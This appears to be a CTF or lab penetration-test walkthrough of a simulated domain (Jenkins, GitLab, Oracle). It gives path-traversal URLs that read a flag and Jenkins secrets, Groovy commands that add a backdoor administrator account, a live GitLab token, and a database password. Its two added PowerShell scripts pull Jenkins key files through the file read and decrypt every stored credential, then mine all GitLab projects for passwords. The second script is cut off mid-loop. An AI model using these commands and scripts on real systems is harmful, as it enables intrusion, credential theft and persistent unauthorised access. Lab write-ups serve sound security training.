Information gathering
Start with the port scan results.
Not much there, just two web services. Following the hint, scan for directories.
One of them exposes a source archive; download it and audit it.
Arbitrary file read
The audit turns up an unfiltered logfile parameter in content-log.php. First read the flag, then read the admin password of the other site with it.
http://39.98.114.207/tools/content-log.php?logfile=../../../../../../../../../Users/Administrator/flag/flag01.txt
http://39.98.114.207/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword
Then use it to log in to the other site's back end.
Jenkins back-end RCE
Jenkins has a built-in place to execute commands: the Script Console (/script) runs arbitrary Groovy under the Jenkins service account.
The service runs with high privileges, so add a backdoor user and RDP in:
println "net user oceanz admin@123 /add".execute().text
println "net localgroup administrators oceanz /add".execute().text
Internal network penetration
Scan the internal network first, and set up a proxy through this host for the rest of the engagement.
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.14.7 is alive
(icmp) Target 172.22.14.11 is alive
(icmp) Target 172.22.14.16 is alive
(icmp) Target 172.22.14.31 is alive
(icmp) Target 172.22.14.46 is alive
[*] Icmp alive hosts len is: 5
172.22.14.7:3306 open
172.22.14.7:8080 open
172.22.14.31:1521 open
172.22.14.11:445 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.7:445 open
172.22.14.31:139 open
172.22.14.46:139 open
172.22.14.11:139 open
172.22.14.31:135 open
172.22.14.46:135 open
172.22.14.7:139 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] WebTitle http://172.22.14.16 code:302 len:99 title:None redirect url: http://172.22.14.16/users/sign_in
[*] NetBios 172.22.14.11 [+] DC:XIAORANG\XR-DC
[*] NetInfo
[*]172.22.14.11
[->]XR-DC
[->]172.22.14.11
[*] WebTitle http://172.22.14.7:8080 code:403 len:548 title:None
[*] WebTitle http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] NetInfo
[*]172.22.14.46
[->]XR-0923
[->]172.22.14.46
[*] NetBios 172.22.14.46 XIAORANG\XR-0923
[*] NetBios 172.22.14.31 WORKGROUP\XR-ORACLE
[*] NetInfo
[*]172.22.14.31
[->]XR-ORACLE
[->]172.22.14.31
[*] WebTitle http://172.22.14.7 code:200 len:54603 title:XR SHOP
[*] WebTitle http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
The hint for the second stage mentions a GitLab API token, so dig through the Jenkins configuration files. credentials.xml in JENKINS_HOME holds it:
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="[email protected]">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="[email protected]">
<scope>GLOBAL</scope>
<id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
<description></description>
<apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
</com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
The apiToken is stored encrypted with the instance's hudson.util.Secret key. Since we already have the Script Console, the simplest way to decrypt it is to let Jenkins do it:
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
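The same decryption can be done offline, which matters when there is a file read but no Script Console. The PowerShell below is an added example, not code from the original writeup: it pulls master.key, hudson.util.Secret and credentials.xml through the logfile parameter of content-log.php described in the file-read section, then re-implements Jenkins' own scheme (AES key = first 16 bytes of SHA-256 over the trimmed master.key text; hudson.util.Secret = AES-128-ECB of 256 random key bytes followed by the "::::MAGIC::::" trailer; each {…} value = base64 of version byte 0x01, 4-byte big-endian IV and data lengths, IV, AES-128-CBC/PKCS7 ciphertext). The JENKINS_HOME path follows the request above; that the PHP endpoint returns file bodies byte-for-byte, and the local output directory, are assumptions.

```powershell
# Added example, not from the original writeup: arbitrary file read -> offline Jenkins secret decryption.
# Assumptions: JENKINS_HOME is C:\ProgramData\Jenkins\.jenkins and content-log.php echoes files unmodified.
$Target      = 'http://39.98.114.207/tools/content-log.php'
$JenkinsHome = 'C:\ProgramData\Jenkins\.jenkins'
$Loot        = Join-Path $PWD 'jenkins-loot'           # assumed local output directory
New-Item -ItemType Directory -Force -Path $Loot | Out-Null

function Get-JenkinsFile([string]$Relative) {
    # master.key + secrets\hudson.util.Secret are the key material; credentials.xml holds the ciphertexts.
    $dest = Join-Path $Loot (Split-Path -Leaf $Relative)
    $uri  = "$Target?logfile=$([uri]::EscapeDataString((Join-Path $JenkinsHome $Relative)))"
    Invoke-WebRequest -UseBasicParsing -Uri $uri -OutFile $dest   # -OutFile keeps the binary file intact
    return $dest
}

function Get-JenkinsSecretKey([string]$MasterKeyPath, [string]$HudsonSecretPath) {
    # Jenkins: master AES key = first 16 bytes of SHA-256(trimmed master.key text, UTF-8).
    $masterText = (Get-Content -Raw -Path $MasterKeyPath).Trim()
    $hash = [System.Security.Cryptography.SHA256]::Create().ComputeHash([Text.Encoding]::UTF8.GetBytes($masterText))
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode = 'ECB'; $aes.Padding = 'PKCS7'; $aes.Key = [byte[]]$hash[0..15]
    # hudson.util.Secret = AES-ECB(master key, 256 random bytes + "::::MAGIC::::")
    $blob  = [IO.File]::ReadAllBytes($HudsonSecretPath)
    $plain = $aes.CreateDecryptor().TransformFinalBlock($blob, 0, $blob.Length)
    $magic = [Text.Encoding]::ASCII.GetBytes('::::MAGIC::::')
    $tail  = [byte[]]$plain[($plain.Length - $magic.Length)..($plain.Length - 1)]
    if ([BitConverter]::ToString($tail) -ne [BitConverter]::ToString($magic)) {
        throw 'MAGIC trailer missing: wrong master.key, or the file was altered in transit'
    }
    return [byte[]]$plain[0..15]   # Secret.getKey() uses the first 16 bytes of the payload
}

function Unprotect-JenkinsSecret([string]$Encrypted, [byte[]]$Key) {
    # New format: "{" base64( 0x01 | ivLen(4, BE) | dataLen(4, BE) | iv | AES-128-CBC/PKCS7 ciphertext ) "}"
    if (-not ($Encrypted.StartsWith('{') -and $Encrypted.EndsWith('}'))) { throw 'not a new-format Jenkins secret' }
    $p = [Convert]::FromBase64String($Encrypted.Substring(1, $Encrypted.Length - 2))
    if ($p[0] -ne 1) { throw "unsupported payload version $($p[0])" }
    $ivLen   = ([int]$p[1] -shl 24) -bor ([int]$p[2] -shl 16) -bor ([int]$p[3] -shl 8) -bor [int]$p[4]
    $dataLen = ([int]$p[5] -shl 24) -bor ([int]$p[6] -shl 16) -bor ([int]$p[7] -shl 8) -bor [int]$p[8]
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode = 'CBC'; $aes.Padding = 'PKCS7'
    $aes.Key = $Key
    $aes.IV  = [byte[]]$p[9..(8 + $ivLen)]
    $data    = [byte[]]$p[(9 + $ivLen)..(8 + $ivLen + $dataLen)]
    $plain   = $aes.CreateDecryptor().TransformFinalBlock($data, 0, $data.Length)
    return [Text.Encoding]::UTF8.GetString($plain)
}

$master = Get-JenkinsFile 'secrets\master.key'
$hudson = Get-JenkinsFile 'secrets\hudson.util.Secret'
$creds  = Get-JenkinsFile 'credentials.xml'
$key    = Get-JenkinsSecretKey -MasterKeyPath $master -HudsonSecretPath $hudson

# Decrypt every {...} blob in credentials.xml (apiToken, password and privateKey fields alike).
foreach ($m in [regex]::Matches((Get-Content -Raw -Path $creds), '\{[A-Za-z0-9+/=]+\}')) {
    '{0}... -> {1}' -f $m.Value.Substring(0, [Math]::Min(12, $m.Value.Length)), (Unprotect-JenkinsSecret -Encrypted $m.Value -Key $key)
}
```

The MAGIC check is the useful failure signal: if the file read corrupts binary content (for example by adding HTML around it), the trailer comparison fails before any bogus key is used on credentials.xml.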
With the plaintext token, list the GitLab projects through the API and look for the Oracle password:
./proxychains4 -f proxychains.conf curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"
Output:
[
{
"id": 6,
"description": null,
"name": "Internal Secret",
"name_with_namespace": "XRLAB / Internal Secret",
"path": "internal-secret",
"path_with_namespace": "xrlab/internal-secret",
"created_at": "2022-12-25T08:30:12.362Z",
"default_branch": "main",
"tag_list": [ ],
"topics": [ ],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T08:30:12.362Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/6",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/6/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/6/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/6/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/6/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T08:30:12.373Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [ ],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 4,
"description": null,
"name": "XRAdmin",
"name_with_namespace": "XRLAB / XRAdmin",
"path": "xradmin",
"path_with_namespace": "xrlab/xradmin",
"created_at": "2022-12-25T07:48:16.751Z",
"default_branch": "main",
"tag_list": [ ],
"topics": [ ],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2023-05-30T10:27:31.762Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/4",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/4/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/4/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/4/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/4/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:48:16.788Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [ ],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": false,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 3,
"description": null,
"name": "Awenode",
"name_with_namespace": "XRLAB / Awenode",
"path": "awenode",
"path_with_namespace": "xrlab/awenode",
"created_at": "2022-12-25T07:46:43.635Z",
"default_branch": "master",
"tag_list": [ ],
"topics": [ ],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:46:43.635Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/3",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/3/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/3/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/3/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/3/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:46:44.614Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [ ],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 2,
"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
"name": "XRWiki",
"name_with_namespace": "XRLAB / XRWiki",
"path": "xrwiki",
"path_with_namespace": "xrlab/xrwiki",
"created_at": "2022-12-25T07:44:18.589Z",
"default_branch": "master",
"tag_list": [ ],
"topics": [ ],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
"avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:44:18.589Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/2",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/2/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/2/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/2/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/2/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": null,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:44:18.627Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": false,
"jobs_enabled": true,
"snippets_enabled": false,
"container_registry_enabled": false,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "disabled",
"builds_access_level": "enabled",
"snippets_access_level": "disabled",
"pages_access_level": "public",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "disabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [ ],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": false,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 1,
"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
"name": "Monitoring",
"name_with_namespace": "GitLab Instance / Monitoring",
"path": "Monitoring",
"path_with_namespace": "gitlab-instance-23352f48/Monitoring",
"created_at": "2022-12-25T07:18:20.914Z",
"default_branch": "main",
"tag_list": [ ],
"topics": [ ],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
"web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:18:20.914Z",
"namespace": {
"id": 2,
"name": "GitLab Instance",
"path": "gitlab-instance-23352f48",
"kind": "group",
"full_path": "gitlab-instance-23352f48",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/1",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/1/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/1/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/1/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/1/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"
},
"packages_enabled": true,
"empty_repo": true,
"archived": false,
"visibility": "internal",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:18:21.108Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [ ],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": null
}
}
]
Clone these projects and go through them (the token works as the HTTP password; the username is arbitrary):
proxychains git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/internal-secret.git
proxychains git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/xradmin.git
proxychains git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/xrwiki.git
proxychains git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/awenode.git
They contain a pile of usernames and passwords.
The xradmin repository holds the database credentials:
url: 172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf
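Cloning and grepping by hand scales badly once a token has access to many projects. As an added example that is not part of the original writeup, the PowerShell below does the same hunt purely over the GitLab REST API: it pages through every project the token is a member of, walks each default branch with the recursive tree endpoint, fetches each blob raw and flags lines that match a credential pattern. The token is the one decrypted from credentials.xml; the keyword list, and that the script runs from a host that can reach 172.22.14.16 over HTTP, are assumptions.

```powershell
# Added example, not from the original writeup: credential hunt over the GitLab v4 API.
# Assumes the PAT recovered from Jenkins and direct HTTP reachability of the GitLab host.
$Base    = 'http://172.22.14.16/api/v4'
$Headers = @{ 'PRIVATE-TOKEN' = 'glpat-7kD_qLH2PiQv_ywB9hz2' }
$Pattern = 'password|passwd|secret|token|jdbc:|:1521'      # assumed credential indicators

function Get-GitLabPages([string]$Url) {
    # Follow GitLab's offset pagination: X-Next-Page is empty on the last page.
    $page = 1
    do {
        $sep  = if ($Url -match '\?') { '&' } else { '?' }
        $resp = Invoke-WebRequest -UseBasicParsing -Headers $Headers -Uri "$Url${sep}per_page=100&page=$page"
        $items = $resp.Content | ConvertFrom-Json
        foreach ($item in $items) { $item }          # emit elements one by one (5.1 returns the array as a single object)
        $page = [string]($resp.Headers['X-Next-Page'] | Select-Object -First 1)
    } while ($page -ne '')
}

foreach ($p in Get-GitLabPages "$Base/projects?membership=true") {
    Write-Host "== $($p.path_with_namespace) (id $($p.id), branch $($p.default_branch))"
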